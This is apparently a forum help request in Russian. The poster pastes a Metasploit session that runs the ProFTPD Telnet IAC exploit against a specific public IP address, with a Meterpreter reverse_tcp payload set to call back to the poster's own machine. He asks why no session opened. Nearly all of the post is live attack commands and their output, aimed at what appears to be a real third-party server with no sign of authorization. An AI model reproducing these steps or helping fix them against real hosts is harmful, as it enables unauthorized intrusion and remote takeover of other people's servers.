
14.03.2014, 01:50
|
|
Новичок
Регистрация: 19.01.2014
Сообщений: 17
С нами:
6481046
Репутация:
0
|
|
Что не так?
Код:
msf > use linux/ftp/proftp_telnet_iac
msf exploit(proftp_telnet_iac) > set RHOST 213.239.235.179
RHOST => 213.239.235.179
msf exploit(proftp_telnet_iac) > set RPORT 21
RPORT => 21
msf exploit(proftp_telnet_iac) > set TARGET 0
TARGET => 0
msf exploit(proftp_telnet_iac) > set PAYLOAD linux/x86/meterpreter/reverse_tcp PAYLOAD => linux/x86/meterpreter/reverse_tcp
msf exploit(proftp_telnet_iac) > set LHOST 192.168.1.4
LHOST => 192.168.1.4
msf exploit(proftp_telnet_iac) > exploit[*] Started reverse handler on 192.168.1.4:4444[*] Automatically detecting the target... [*] FTP Banner: 220 ProFTPD 1.3.3a Server (Debian) [::ffff:213.239.235.179][*] Selected Target: ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1
msf exploit(proftp_telnet_iac) >
И всё((
|
|
|